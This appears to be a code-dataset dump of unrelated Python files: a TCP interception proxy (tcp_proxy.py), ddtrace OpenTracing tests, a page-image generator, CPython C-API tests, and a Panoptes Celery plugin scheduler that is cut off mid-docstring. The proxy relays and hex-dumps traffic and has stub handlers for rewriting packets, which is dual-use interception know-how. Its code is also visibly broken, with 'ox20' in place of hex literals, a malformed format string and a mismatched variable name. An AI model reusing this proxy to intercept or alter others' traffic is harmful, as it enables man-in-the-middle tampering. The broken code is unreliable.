source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
tcp_proxy.py
|
#!/usr/bin/env python3
import sys
import socket
import threading
import getopt
import subprocess
from colorama import init
from termcolor import cprint
from pyfiglet import figlet_format
def usage():
cprint(figlet_format('Proxy',font='dotmatrix'),'yellow','on_red',attrs=['bold'])
if len(sys.argv[1:]) != 5:
print ("Usage: ./proxy.py [localhost] [localport] [remotehost] [remoteport] [receive_first]")
print ("Example:- ./proxy.py 127.0.0.1 9000 10.12.132.1 9000 True")
sys.exit(0)
def server_loop(local_host,local_port,remote_host,remote_port,receive_first):
server = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
server.bind((local_host,local_port))
except:
print("[!!] Failed to listen on %s:%d %(local_host,local_port)")
print("[!!] Check for other listening sockets or correct permissions.")
sys.exit(0)
print("[*] Listening on %s:%d" %(local_host,local_port))
server.listen(5)
while True:
client_socket,addr = server.accept()
#print out the local connection information
print("[==>] Received incoming connection from %s:%d" %(addr[0],addr[1]))
#start a thread to talk to the remote host
proxy_thread = threading.Thread(target=proxy_handler,args=(client_socket,remote_host,remote_port,receive_first))
proxy_thread.start()
def proxy_handler(client_socket,remote_host,remote_port,receive_first):
# connect to the remote host
remote_socket = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
remote_socket.connect((remote_host,remote_port))
# receive data from the remote end if necessary
if receive_first:
remote_buffer = receive_from(remote_socket)
hexdump(remote_buffer)
# send it our response handler
remote_buffer = response_handler(remote_buffer)
# if we have data to send to our local client, send it
if len(remote_buffer):
print("[<==] Sending %d bytes to localhost." %len(remote_buffer))
client_socket.send(remote_buffer)
#now lets loop and read from local
#send to remote, send to local
#rinse, wash, repeat
while True:
#read from local host
local_buffer = receive_from(client_socket)
if len(local_buffer):
print("[==>] Received %d bytes from localhost." %len(local_buffer))
hexdump(local_buffer)
#send it to our request handler
local_buffer = request_handler(local_buffer)
#send off the data to the remote host
remote_socket.send(local_buffer)
print("[==>] Sent to remote.")
#receive back the response
remote_buffer = receive_from(remote_socket)
if len(remote_buffer):
print("[<==] Received %d bytes from remote." %len(remote_buffer))
hexdump(remote_buffer)
#send to our response handler
remote_buffer = response_handler(remote_buffer)
#send the response to the local socket
client_socket.send(remote_buffer)
print("[<==] Sent to localhost")
# if no mire data on either side, close the connections
if not len(local_buffer) or not len(remote_buffer):
client_socket.close()
remote_socket.close()
print("[*] No more data.Closing connections.")
break
#this is pretty hex dumping function directly taken from the comments here:
def hexdump(src,length=16):
result = []
digits = 4 if isinstance(src,unicode)else 2
for i in xrange(0,len(src),length):
s = src[i:i+length]
hexa = b' '.join(["%o*X" % (digits,ord(x)) for x in s])
text = b''.join([x if ox20 <= ord(x) < ox7F else b'.' for x in s])
result.append(b"%04X %-*s %s" %(i,length*(digits +1),hexa,text))
print(b'\n'.join(result))
def receive_from(connections):
buffer = ""
# We set a 2 second timeout;depending on your target, this may need to be adjusted
connection.settimeout(2)
try:
# keep reading into the buffer until
# there's no more data
# or we time out
while True:
data = connection.recv(4096)
if not data:
break
buffer += data
except:
pass
return buffer
# modify any requests destined for the remote host
def request_handler(buffer):
#peform packet modifications
return buffer
def response_handler(buffer):
#perform packet modifications
return buffer
def main():
usage()
# setup local listenening parameters
local_host = sys.argv[1]
local_port = int(sys.argv[2])
# setup remote target
remote_host = sys.argv[3]
remote_port = int(sys.argv[4])
#this tells our proxy to connect and receive data
#before sending to the remote host
receive_first = sys.argv[5]
if "True" in receive_first:
receive_first = True
else:
receive_first = False
# now spin up our listening socket
server_loop(local_host,local_port,remote_host,remote_port,receive_first)
main()
|
test_tracer.py
|
import opentracing
from opentracing import (
child_of,
Format,
InvalidCarrierException,
UnsupportedFormatException,
SpanContextCorruptedException,
)
import ddtrace
from ddtrace.ext.priority import AUTO_KEEP
from ddtrace.opentracer import Tracer, set_global_tracer
from ddtrace.opentracer.span_context import SpanContext
from ddtrace.propagation.http import HTTP_HEADER_TRACE_ID
from ddtrace.settings import ConfigException
import pytest
from .utils import ot_tracer_factory, ot_tracer, writer
class TestTracerConfig(object):
def test_config(self):
"""Test the configuration of the tracer"""
config = {"enabled": True}
tracer = Tracer(service_name="myservice", config=config)
assert tracer._service_name == "myservice"
assert tracer._enabled is True
def test_no_service_name(self):
"""A service_name should be generated if one is not provided."""
tracer = Tracer()
assert tracer._service_name == "pytest"
def test_multiple_tracer_configs(self):
"""Ensure that a tracer config is a copy of the passed config."""
config = {"enabled": True}
tracer1 = Tracer(service_name="serv1", config=config)
assert tracer1._service_name == "serv1"
config["enabled"] = False
tracer2 = Tracer(service_name="serv2", config=config)
# Ensure tracer1's config was not mutated
assert tracer1._service_name == "serv1"
assert tracer1._enabled is True
assert tracer2._service_name == "serv2"
assert tracer2._enabled is False
def test_invalid_config_key(self):
"""A config with an invalid key should raise a ConfigException."""
config = {"enabeld": False}
# No debug flag should not raise an error
tracer = Tracer(service_name="mysvc", config=config)
# With debug flag should raise an error
config["debug"] = True
with pytest.raises(ConfigException) as ce_info:
tracer = Tracer(config=config)
assert "enabeld" in str(ce_info)
assert tracer is not None
# Test with multiple incorrect keys
config["setttings"] = {}
with pytest.raises(ConfigException) as ce_info:
tracer = Tracer(service_name="mysvc", config=config)
assert ["enabeld", "setttings"] in str(ce_info)
assert tracer is not None
class TestTracer(object):
def test_start_span(self, ot_tracer, writer):
"""Start and finish a span."""
import time
with ot_tracer.start_span("myop") as span:
time.sleep(0.005)
# span should be finished when the context manager exits
assert span._finished
spans = writer.pop()
assert len(spans) == 1
def test_start_span_references(self, ot_tracer, writer):
"""Start a span using references."""
with ot_tracer.start_span("one", references=[child_of()]):
pass
spans = writer.pop()
assert spans[0].parent_id is None
root = ot_tracer.start_active_span("root")
# create a child using a parent reference that is not the context parent
with ot_tracer.start_active_span("one"):
with ot_tracer.start_active_span("two", references=[child_of(root.span)]):
pass
root.close()
spans = writer.pop()
assert spans[2].parent_id is spans[0].span_id
def test_start_span_custom_start_time(self, ot_tracer):
"""Start a span with a custom start time."""
import time
t = time.time() + 0.002
with ot_tracer.start_span("myop", start_time=t) as span:
time.sleep(0.005)
# it should be certain that the span duration is strictly less than
# the amount of time we sleep for
assert span._dd_span.duration < 0.005
def test_start_span_with_spancontext(self, ot_tracer, writer):
"""Start and finish a span using a span context as the child_of
reference.
"""
import time
with ot_tracer.start_span("myop") as span:
time.sleep(0.005)
with ot_tracer.start_span("myop", child_of=span.context) as span2:
time.sleep(0.008)
# span should be finished when the context manager exits
assert span._finished
assert span2._finished
spans = writer.pop()
assert len(spans) == 2
# ensure proper parenting
assert spans[1].parent_id is spans[0].span_id
def test_start_span_with_tags(self, ot_tracer):
"""Create a span with initial tags."""
tags = {"key": "value", "key2": "value2"}
with ot_tracer.start_span("myop", tags=tags) as span:
pass
assert span._dd_span.get_tag("key") == "value"
assert span._dd_span.get_tag("key2") == "value2"
def test_start_active_span_multi_child(self, ot_tracer, writer):
"""Start and finish multiple child spans.
This should ensure that child spans can be created 2 levels deep.
"""
import time
with ot_tracer.start_active_span("myfirstop") as scope1:
time.sleep(0.009)
with ot_tracer.start_active_span("mysecondop") as scope2:
time.sleep(0.007)
with ot_tracer.start_active_span("mythirdop") as scope3:
time.sleep(0.005)
# spans should be finished when the context manager exits
assert scope1.span._finished
assert scope2.span._finished
assert scope3.span._finished
spans = writer.pop()
# check spans are captured in the trace
assert scope1.span._dd_span is spans[0]
assert scope2.span._dd_span is spans[1]
assert scope3.span._dd_span is spans[2]
# ensure proper parenting
assert spans[1].parent_id is spans[0].span_id
assert spans[2].parent_id is spans[1].span_id
# sanity check a lower bound on the durations
assert spans[0].duration >= 0.009 + 0.007 + 0.005
assert spans[1].duration >= 0.007 + 0.005
assert spans[2].duration >= 0.005
def test_start_active_span_multi_child_siblings(self, ot_tracer, writer):
"""Start and finish multiple span at the same level.
This should test to ensure a parent can have multiple child spans at the
same level.
"""
import time
with ot_tracer.start_active_span("myfirstop") as scope1:
time.sleep(0.009)
with ot_tracer.start_active_span("mysecondop") as scope2:
time.sleep(0.007)
with ot_tracer.start_active_span("mythirdop") as scope3:
time.sleep(0.005)
# spans should be finished when the context manager exits
assert scope1.span._finished
assert scope2.span._finished
assert scope3.span._finished
spans = writer.pop()
# check spans are captured in the trace
assert scope1.span._dd_span is spans[0]
assert scope2.span._dd_span is spans[1]
assert scope3.span._dd_span is spans[2]
# ensure proper parenting
assert spans[1].parent_id is spans[0].span_id
assert spans[2].parent_id is spans[0].span_id
# sanity check a lower bound on the durations
assert spans[0].duration >= 0.009 + 0.007 + 0.005
assert spans[1].duration >= 0.007
assert spans[2].duration >= 0.005
def test_start_span_manual_child_of(self, ot_tracer, writer):
"""Start spans without using a scope manager.
Spans should be created without parents since there will be no call
for the active span.
"""
import time
root = ot_tracer.start_span("zero")
with ot_tracer.start_span("one", child_of=root):
time.sleep(0.009)
with ot_tracer.start_span("two", child_of=root):
time.sleep(0.007)
with ot_tracer.start_span("three", child_of=root):
time.sleep(0.005)
root.finish()
spans = writer.pop()
assert spans[0].parent_id is None
# ensure each child span is a child of root
assert spans[1].parent_id is root._dd_span.span_id
assert spans[2].parent_id is root._dd_span.span_id
assert spans[3].parent_id is root._dd_span.span_id
assert (
spans[0].trace_id == spans[1].trace_id
and spans[1].trace_id == spans[2].trace_id
)
def test_start_span_no_active_span(self, ot_tracer, writer):
"""Start spans without using a scope manager.
Spans should be created without parents since there will be no call
for the active span.
"""
import time
with ot_tracer.start_span("one", ignore_active_span=True):
time.sleep(0.009)
with ot_tracer.start_span("two", ignore_active_span=True):
time.sleep(0.007)
with ot_tracer.start_span("three", ignore_active_span=True):
time.sleep(0.005)
spans = writer.pop()
# ensure each span does not have a parent
assert spans[0].parent_id is None
assert spans[1].parent_id is None
assert spans[2].parent_id is None
# and that each span is a new trace
assert (
spans[0].trace_id != spans[1].trace_id
and spans[1].trace_id != spans[2].trace_id
and spans[0].trace_id != spans[2].trace_id
)
def test_start_active_span_child_finish_after_parent(self, ot_tracer, writer):
"""Start a child span and finish it after its parent."""
import time
span1 = ot_tracer.start_active_span("one").span
span2 = ot_tracer.start_active_span("two").span
span1.finish()
time.sleep(0.005)
span2.finish()
spans = writer.pop()
assert len(spans) is 2
assert spans[0].parent_id is None
assert spans[1].parent_id is span1._dd_span.span_id
assert spans[1].duration > spans[0].duration
def test_start_span_multi_intertwined(self, ot_tracer, writer):
"""Start multiple spans at the top level intertwined.
Alternate calling between two traces.
"""
import threading
import time
def trace_one():
id = 11
with ot_tracer.start_active_span(str(id)):
id += 1
time.sleep(0.009)
with ot_tracer.start_active_span(str(id)):
id += 1
time.sleep(0.001)
with ot_tracer.start_active_span(str(id)):
pass
def trace_two():
id = 21
with ot_tracer.start_active_span(str(id)):
id += 1
time.sleep(0.006)
with ot_tracer.start_active_span(str(id)):
id += 1
time.sleep(0.009)
with ot_tracer.start_active_span(str(id)):
pass
# the ordering should be
# t1.span1/t2.span1, t2.span2, t1.span2, t1.span3, t2.span3
t1 = threading.Thread(target=trace_one)
t1.daemon = True
t2 = threading.Thread(target=trace_two)
t2.daemon = True
t1.start()
t2.start()
# wait for threads to finish
time.sleep(0.018)
spans = writer.pop()
# trace_one will finish before trace_two so its spans should be written
# before the spans from trace_two, let's confirm this
assert spans[0].name == "11"
assert spans[1].name == "12"
assert spans[2].name == "13"
assert spans[3].name == "21"
assert spans[4].name == "22"
assert spans[5].name == "23"
# next let's ensure that each span has the correct parent:
# trace_one
assert spans[0].parent_id is None
assert spans[1].parent_id is spans[0].span_id
assert spans[2].parent_id is spans[1].span_id
# trace_two
assert spans[3].parent_id is None
assert spans[4].parent_id is spans[3].span_id
assert spans[5].parent_id is spans[3].span_id
# finally we should ensure that the trace_ids are reasonable
# trace_one
assert (
spans[0].trace_id == spans[1].trace_id
and spans[1].trace_id == spans[2].trace_id
)
# traces should be independent
assert spans[2].trace_id != spans[3].trace_id
# trace_two
assert (
spans[3].trace_id == spans[4].trace_id
and spans[4].trace_id == spans[5].trace_id
)
def test_start_active_span(self, ot_tracer, writer):
with ot_tracer.start_active_span("one") as scope:
pass
assert scope.span._dd_span.name == "one"
assert scope.span._finished
spans = writer.pop()
assert spans
def test_start_active_span_finish_on_close(self, ot_tracer, writer):
with ot_tracer.start_active_span("one", finish_on_close=False) as scope:
pass
assert scope.span._dd_span.name == "one"
assert not scope.span._finished
spans = writer.pop()
assert not spans
def test_start_active_span_nested(self, ot_tracer):
"""Test the active span of multiple nested calls of start_active_span."""
with ot_tracer.start_active_span("one") as outer_scope:
assert ot_tracer.active_span == outer_scope.span
with ot_tracer.start_active_span("two") as inner_scope:
assert ot_tracer.active_span == inner_scope.span
with ot_tracer.start_active_span(
"three"
) as innest_scope: # why isn't it innest? innermost so verbose
assert ot_tracer.active_span == innest_scope.span
with ot_tracer.start_active_span("two") as inner_scope:
assert ot_tracer.active_span == inner_scope.span
assert ot_tracer.active_span == outer_scope.span
assert ot_tracer.active_span is None
def test_start_active_span_trace(self, ot_tracer, writer):
"""Test the active span of multiple nested calls of start_active_span."""
with ot_tracer.start_active_span("one") as outer_scope:
outer_scope.span.set_tag("outer", 2)
with ot_tracer.start_active_span("two") as inner_scope:
inner_scope.span.set_tag("inner", 3)
with ot_tracer.start_active_span("two") as inner_scope:
inner_scope.span.set_tag("inner", 3)
with ot_tracer.start_active_span("three") as innest_scope:
innest_scope.span.set_tag("innerest", 4)
spans = writer.pop()
assert spans[0].parent_id is None
assert spans[1].parent_id is spans[0].span_id
assert spans[2].parent_id is spans[0].span_id
assert spans[3].parent_id is spans[2].span_id
@pytest.fixture
def nop_span_ctx():
return SpanContext(sampling_priority=AUTO_KEEP, sampled=True)
class TestTracerSpanContextPropagation(object):
"""Test the injection and extration of a span context from a tracer."""
def test_invalid_format(self, ot_tracer, nop_span_ctx):
"""An invalid format should raise an UnsupportedFormatException."""
# test inject
with pytest.raises(UnsupportedFormatException):
ot_tracer.inject(nop_span_ctx, None, {})
# test extract
with pytest.raises(UnsupportedFormatException):
ot_tracer.extract(None, {})
def test_inject_invalid_carrier(self, ot_tracer, nop_span_ctx):
"""Only dicts should be supported as a carrier."""
with pytest.raises(InvalidCarrierException):
ot_tracer.inject(nop_span_ctx, Format.HTTP_HEADERS, None)
def test_extract_invalid_carrier(self, ot_tracer):
"""Only dicts should be supported as a carrier."""
with pytest.raises(InvalidCarrierException):
ot_tracer.extract(Format.HTTP_HEADERS, None)
def test_http_headers_base(self, ot_tracer):
"""extract should undo inject for http headers."""
span_ctx = SpanContext(trace_id=123, span_id=456)
carrier = {}
ot_tracer.inject(span_ctx, Format.HTTP_HEADERS, carrier)
assert len(carrier.keys()) > 0
ext_span_ctx = ot_tracer.extract(Format.HTTP_HEADERS, carrier)
assert ext_span_ctx._dd_context.trace_id == 123
assert ext_span_ctx._dd_context.span_id == 456
def test_http_headers_baggage(self, ot_tracer):
"""extract should undo inject for http headers."""
span_ctx = SpanContext(
trace_id=123, span_id=456, baggage={"test": 4, "test2": "string"}
)
carrier = {}
ot_tracer.inject(span_ctx, Format.HTTP_HEADERS, carrier)
assert len(carrier.keys()) > 0
ext_span_ctx = ot_tracer.extract(Format.HTTP_HEADERS, carrier)
assert ext_span_ctx._dd_context.trace_id == 123
assert ext_span_ctx._dd_context.span_id == 456
assert ext_span_ctx.baggage == span_ctx.baggage
def test_empty_propagated_context(self, ot_tracer):
"""An empty propagated context should raise a
SpanContextCorruptedException when extracted.
"""
carrier = {}
with pytest.raises(SpanContextCorruptedException):
ot_tracer.extract(Format.HTTP_HEADERS, carrier)
def test_text(self, ot_tracer):
"""extract should undo inject for http headers"""
span_ctx = SpanContext(
trace_id=123, span_id=456, baggage={"test": 4, "test2": "string"}
)
carrier = {}
ot_tracer.inject(span_ctx, Format.TEXT_MAP, carrier)
assert len(carrier.keys()) > 0
ext_span_ctx = ot_tracer.extract(Format.TEXT_MAP, carrier)
assert ext_span_ctx._dd_context.trace_id == 123
assert ext_span_ctx._dd_context.span_id == 456
assert ext_span_ctx.baggage == span_ctx.baggage
def test_corrupted_propagated_context(self, ot_tracer):
"""Corrupted context should raise a SpanContextCorruptedException."""
span_ctx = SpanContext(
trace_id=123, span_id=456, baggage={"test": 4, "test2": "string"}
)
carrier = {}
ot_tracer.inject(span_ctx, Format.TEXT_MAP, carrier)
assert len(carrier.keys()) > 0
# manually alter a key in the carrier baggage
del carrier[HTTP_HEADER_TRACE_ID]
corrupted_key = HTTP_HEADER_TRACE_ID[2:]
carrier[corrupted_key] = 123
with pytest.raises(SpanContextCorruptedException):
ot_tracer.extract(Format.TEXT_MAP, carrier)
def test_immutable_span_context(self, ot_tracer):
"""Span contexts should be immutable."""
with ot_tracer.start_span("root") as root:
ctx_before = root.context
root.set_baggage_item("test", 2)
assert ctx_before is not root.context
with ot_tracer.start_span("child") as level1:
with ot_tracer.start_span("child") as level2:
pass
assert root.context is not level1.context
assert level2.context is not level1.context
assert level2.context is not root.context
def test_inherited_baggage(self, ot_tracer):
"""Baggage should be inherited by child spans."""
with ot_tracer.start_active_span("root") as root:
# this should be passed down to the child
root.span.set_baggage_item("root", 1)
root.span.set_baggage_item("root2", 1)
with ot_tracer.start_active_span("child") as level1:
level1.span.set_baggage_item("level1", 1)
with ot_tracer.start_active_span("child") as level2:
level2.span.set_baggage_item("level2", 1)
# ensure immutability
assert level1.span.context is not root.span.context
assert level2.span.context is not level1.span.context
# level1 should have inherited the baggage of root
assert level1.span.get_baggage_item("root")
assert level1.span.get_baggage_item("root2")
# level2 should have inherited the baggage of both level1 and level2
assert level2.span.get_baggage_item("root")
assert level2.span.get_baggage_item("root2")
assert level2.span.get_baggage_item("level1")
assert level2.span.get_baggage_item("level2")
class TestTracerCompatibility(object):
"""Ensure that our opentracer produces results in the underlying datadog tracer."""
def test_required_dd_fields(self):
"""Ensure required fields needed for successful tracing are possessed
by the underlying datadog tracer.
"""
# a service name is required
tracer = Tracer("service")
with tracer.start_span("my_span") as span:
assert span._dd_span.service
def test_set_global_tracer():
"""Sanity check for set_global_tracer"""
my_tracer = Tracer("service")
set_global_tracer(my_tracer)
assert opentracing.tracer is my_tracer
assert ddtrace.tracer is my_tracer._dd_tracer
|
main.py
|
import time
import os
import argparse
import multiprocessing as mp
import logging
import cProfile, pstats, io
import random
from page_generator import FragmentPage, FilePersistence
from webserver import Webserver
def worker(input_queue, output_queue):
for func, args in iter(input_queue.get, 'STOP'):
result = func(*args)
output_queue.put(result)
def make_page(idno, options):
start = time.time()
persister = FilePersistence(idno, options)
page = FragmentPage(idno, options, persister)
page.create_page()
page.save()
return (persister.get_count(), time.time() - start)
def generate_pages(options):
num_process = options["cpus"]
start_no = options["initial"]
end_no = options["initial"] + options["count"]
start = time.time()
tasks = [(make_page, (i, options)) for i in range(start_no, end_no + 1)]
# Create queues
task_queue = mp.Queue()
done_queue = mp.Queue()
# Submit tasks
for task in tasks:
task_queue.put(task)
# Start worker processes
for _ in range(num_process):
mp.Process(target=worker, args=(task_queue, done_queue)).start()
counter = 0
total_time = 0.0
for _ in range(len(tasks)):
count, time_taken = done_queue.get()
total_time += float(time_taken)
counter += count
if counter % 500 == 0 and counter:
print(
"Generated {} images, average {:.2f} seconds per image".format(
counter, total_time / counter))
for _ in range(num_process):
task_queue.put('STOP')
print("Generated {} images in {:.2f} seconds".format(
end_no - start_no, time.time() - start))
def get_args() :
parser = argparse.ArgumentParser()
parser.add_argument(
"-t",
"--template",
help="Name (as set in json file - not file name/path) of the template to use. " \
"This file containing this template must reside in the templates directory. " \
"If not set templates are choosen at random")
parser.add_argument(
"--daemon",
help="Instead of writing files to a directory, the process server images over HTTP",
action="store_true")
parser.add_argument(
"-o",
"--output_directory",
help="Directory to write images to",
default="output")
parser.add_argument(
"-w",
"--width",
type=int,
help="Width of generated image",
default=1275)
parser.add_argument(
"-l",
"--height",
type=int,
help="Height of generated image",
default=1755)
parser.add_argument(
"-d",
"--dimension",
type=int,
help="Width of output image",
default=600)
parser.add_argument(
"-i",
"--initial",
type=int,
help="Index of first image",
default=1)
parser.add_argument(
"--cpus",
type=int,
help="Number of processes to spawn, defaults to the number of CPUs available",
default=0)
parser.add_argument(
"-p",
"--port",
type=int,
help="Port HTTP server listens on",
default=80)
parser.add_argument(
"-a",
"--augment",
help="Augment images",
action="store_true")
parser.add_argument(
"-c",
"--chop",
help="Chop up image into subimages",
action="store_true")
parser.add_argument(
"--augmentation_file",
help="JSON file containing parameters for the augmentor",
default="augmentation.json")
parser.add_argument(
"--color_model",
help="Color model to store images as RGB (default) or HSV",
choices=["RGB","HSV"],
default="RGB")
parser.add_argument(
"-f",
"--format",
help="File format to generate, png or jpg (default)",
choices=["jpg", "png"],
default="jpg")
parser.add_argument(
"--profile",
help="Profile code",
action="store_true")
parser.add_argument(
"--wordboxes",
help="Output bounding boxes of words",
action="store_true")
parser.add_argument(
"--erode",
help="Erode images",
choices=[0, 3, 5, 7, 9],
type=int,
default=0)
parser.add_argument(
"-s",
"--single",
help="Generate a page with a single rendering of a template - for testing",
action="store_true")
parser.add_argument(
"--random_seed",
help="Seeds the random number generator with a particular value for EACH PAGE, "
"creating identical pages. For debugging single pages only.")
parser.add_argument(
"--deterministic",
help="Seeds the random number generator with known values, creating same data sets on each run",
action="store_true")
parser.add_argument(
"--log_level",
type=int,
help="Set the level of debug logging, with 4 as most detailed through to 0 as least detailed, default 2",
choices=[0,1,2,3,4],
default=2)
parser.add_argument(
"--test_template",
help="Path to a fragment template to test.")
parser.add_argument("count", type=int, help="Number of images to create or queue size if in daemon mode")
return parser.parse_args()
def setup_logging(args) :
log_levels = [logging.FATAL, logging.ERROR, logging.WARN, logging.INFO, logging.DEBUG]
logging.basicConfig(level=log_levels[args.log_level])
def main():
args = get_args()
setup_logging(args)
options = dict(args.__dict__)
options.update({
"format": args.format.strip(),
"dimensions": (args.width, args.height),
"outputSize": (args.dimension, args.dimension),
"draw_debug_rects" : False,
"draw_final_rects" : False,
"color_model" : args.color_model.upper()
})
if not args.cpus :
options["cpus"] = os.cpu_count()
logging.info("Image dimensions: {dimensions} format: {format}".format_map(options))
if args.profile :
pr = cProfile.Profile()
pr.enable()
for i in range(args.initial, args.initial + args.count) :
count, elapsed = pr.runcall(make_page, *(str(i), options))
print(count, elapsed)
if elapsed > 2 :
ps = pstats.Stats(pr)
ps.sort_stats('cumtime')
ps.print_stats(0.1)
pr.clear()
elif args.daemon :
logging.info("Starting webserver, queue size {}".format(args.count))
server = Webserver(options)
server.start_server()
else :
logging.info("Writing images to: {output_directory}".format_map(options))
logging.info("Generating {} images starting at {}".format(args.count, args.initial))
if options["cpus"] == 1 :
for i in range(args.initial, args.initial + args.count) :
num, elapsed = make_page(str(i), options)
print("{} - {} images in {:.2f} seconds".format(i, num, elapsed))
else:
mp.freeze_support()
generate_pages(options)
if __name__ == '__main__':
main()
|
test_capi.py
|
# Run the _testcapi module tests (tests for the Python/C API): by defn,
# these are all functions _testcapi exports whose name begins with 'test_'.
import sys
import unittest
from test import support
import _testcapi
def testfunction(self):
"""some doc"""
return self
class InstanceMethod:
id = _testcapi.instancemethod(id)
testfunction = _testcapi.instancemethod(testfunction)
class CAPITest(unittest.TestCase):
def test_instancemethod(self):
inst = InstanceMethod()
self.assertEqual(id(inst), inst.id())
self.assert_(inst.testfunction() is inst)
self.assertEqual(inst.testfunction.__doc__, testfunction.__doc__)
self.assertEqual(InstanceMethod.testfunction.__doc__, testfunction.__doc__)
InstanceMethod.testfunction.attribute = "test"
self.assertEqual(testfunction.attribute, "test")
self.assertRaises(AttributeError, setattr, inst.testfunction, "attribute", "test")
def test_main():
support.run_unittest(CAPITest)
for name in dir(_testcapi):
if name.startswith('test_'):
test = getattr(_testcapi, name)
if support.verbose:
print("internal", name)
test()
# some extra thread-state tests driven via _testcapi
def TestThreadState():
if support.verbose:
print("auto-thread-state")
idents = []
def callback():
idents.append(_thread.get_ident())
_testcapi._test_thread_state(callback)
a = b = callback
time.sleep(1)
# Check our main thread is in the list exactly 3 times.
if idents.count(_thread.get_ident()) != 3:
raise support.TestFailed(
"Couldn't find main thread correctly in the list")
try:
_testcapi._test_thread_state
have_thread_state = True
except AttributeError:
have_thread_state = False
if have_thread_state:
import _thread
import time
TestThreadState()
import threading
t = threading.Thread(target=TestThreadState)
t.start()
t.join()
if __name__ == "__main__":
test_main()
|
scheduler.py
|
"""
Copyright 2018, Oath Inc.
Licensed under the terms of the Apache 2.0 license. See LICENSE file in project root for terms.
This module implements classes that can be used by any Plugin Scheduler to setup a Celery App and Celery Beat
"""
import signal
import sys
import threading
from .. import const
from ..validators import PanoptesValidators
from ..context import PanoptesContextValidators
from ..celery_manager import PanoptesCeleryInstance, PanoptesCeleryValidators
from ..utilities.helpers import get_client_id, get_os_tid
from ..utilities.lock import PanoptesLock
class PanoptesPluginScheduler(object):
"""
This class implements methods to start and manage Celery App and Celery Beat for Plugin Schedulers
Args:
panoptes_context(PanoptesContext): The Panoptes Context instance that should be used by the Plugin Scheduler
plugin_type (str): The type of the plugins the Plugin Scheduler would handle
plugin_type_display_name (str): The display name that should be used by the Plugin Scheduler in logs and errors
celery_config (PanoptesCeleryConfig): The Celery Config instance that should be used by the Plugin Scheduler
lock_timeout (int): The number of seconds to wait before a lock times out and is retried
plugin_scheduler_task (callable): The callback function that the Plugin Scheduler should call every interval
Returns:
None
"""
def __init__(self, panoptes_context, plugin_type, plugin_type_display_name, celery_config, lock_timeout,
plugin_scheduler_task):
assert PanoptesContextValidators.valid_panoptes_context(
panoptes_context), 'panoptes_context must be an instance of PanoptesContext'
assert PanoptesValidators.valid_nonempty_string(plugin_type), 'plugin_type must be a non-empty str'
assert PanoptesValidators.valid_nonempty_string(plugin_type_display_name), \
'plugin_type_display_name must be a non-empty str'
assert PanoptesCeleryValidators.valid_celery_config(
celery_config), 'celery_config must be an instance of PanoptesCeleryConfig'
assert PanoptesValidators.valid_nonzero_integer(lock_timeout), 'lock_timeout must be an int greater than zero'
assert PanoptesValidators.valid_callback(plugin_scheduler_task), 'plugin_scheduler_task must be a callable'
self._panoptes_context = panoptes_context
self._config = self._panoptes_context.config_dict
self._logger = self._panoptes_context.logger
self._shutdown_plugin_scheduler = threading.Event()
self._plugin_scheduler_celery_beat_service = None
self._celery_config = celery_config
self._celery = None
self._t = None
self._lock = None
self._plugin_type = plugin_type
self._plugin_type_display_name = plugin_type_display_name
self._lock_timeout = lock_timeout
self._plugin_scheduler_task = plugin_scheduler_task
def start(self):
"""
This function starts the Plugin Scheduler. It installs signal handlers, acquire an distributed lock and then
return a Celery application instance
The flow of the startup process is follows:
start -> _celery_beat_service_started (starts) -> plugin_scheduler_task_thread
The plugin_scheduler_task_thread runs the plugin_scheduler_task every "['plugin_type']['plugin_scan_interval']"
seconds, which comes from the system wide configuration file
The reason for this slightly convoluted startup is that because the plugin_scheduler_task needs the Celery Beat
Service instance object so that it can update the schedule periodically and this only available after the
_celery_beat_service_started callback function is called by Celery Beat
Returns:
celery.app: The Celery App instance to be used by the scheduler
"""
logger = self._logger
logger.info('%s Plugin Scheduler main thread: OS PID: %d' % (self._plugin_type_display_name, get_os_tid()))
logger.info('Setting up signal handlers')
self._install_signal_handlers()
client_id = get_client_id(const.PLUGIN_CLIENT_ID_PREFIX)
lock_path = const.PLUGIN_SCHEDULER_LOCK_PATH + '/' + self._plugin_type + '/lock'
logger.info(
'Creating lock object for %s Plugin Scheduler under lock path "%s"' % (self._plugin_type, lock_path))
try:
self._lock = PanoptesLock(context=self._panoptes_context, path=lock_path, timeout=self._lock_timeout,
retries=0, identifier=client_id)
except Exception as e:
sys.exit('Failed to create lock object: %s' % repr(e))
if self._lock.locked:
logger.info('Starting Celery Beat Service')
try:
self._celery = PanoptesCeleryInstance(self._panoptes_context,
self._celery_config).celery
self._celery.conf.update(
CELERYBEAT_MAX_LOOP_INTERVAL=self._config[self._plugin_type]['celerybeat_max_loop_interval'])
except Exception as e:
logger.error('Error trying to start Celery Beat Service: %s' % str(e))
return self._celery
def run(self, sender=None, args=None, **kwargs):
"""
This function is called after the Celery Beat Service has finished initialization.
The function (re)installs the signal handlers, since they are overwritten by the Celery Beat Service.
It stores the reference to the Celery Beat Service instance and starts the Plugin Scheduler thread
Args:
sender (celery.beat.Service): The Celery Beat Service instance
args: Variable length argument list
**kwargs: Arbitrary keyword argument
Returns:
None
"""
logger = self._logger
logger.info('Reinstalling signal handlers after Celery Beat Service setup')
self._install_signal_handlers()
self._plugin_scheduler_celery_beat_service = sender
self._t = threading.Thread(target=self._plugin_scheduler_task_thread)
self._t.start()
def _plugin_scheduler_task_thread(self):
"""
This function is the entry point of the Plugin Scheduler thread. It checks if the Plugin Scheduler is shutdown
mode and if not, then calls the plugin_scheduler_task function every 'plugin_scan_interval'
seconds
Returns:
None
"""
logger = self._logger
logger.info('%s Plugin Scheduler Task thread: OS PID: %d' % (self._plugin_type_display_name, get_os_tid()))
while not self._shutdown_plugin_scheduler.is_set():
if self._lock.locked:
try:
self._plugin_scheduler_task(self._plugin_scheduler_celery_beat_service)
except Exception:
logger.exception('Error trying to execute plugin scheduler task')
else:
logger.warn('%s Plugin Scheduler lock not held, skipping scheduling cycle')
self._shutdown_plugin_scheduler.wait(self._config[self._plugin_type]['plugin_scan_interval'])
logger.critical('%s Plugin Scheduler Task thread shutdown' % self._plugin_type_display_name)
def _install_signal_handlers(self):
"""
Installs signal handlers for SIGTERM, SIGINT and SIGHUP
Returns:
None
"""
signal.signal(signal.SIGTERM, self._signal_handler)
signal.signal(signal.SIGINT, self._signal_handler)
signal.signal(signal.SIGHUP, self._signal_handler)
def _signal_handler(self, signal_number, _):
"""
The signal handler addresses two scenarios:
* The Plugin Scheduler thread is alive: sets an event to shutdown the thread
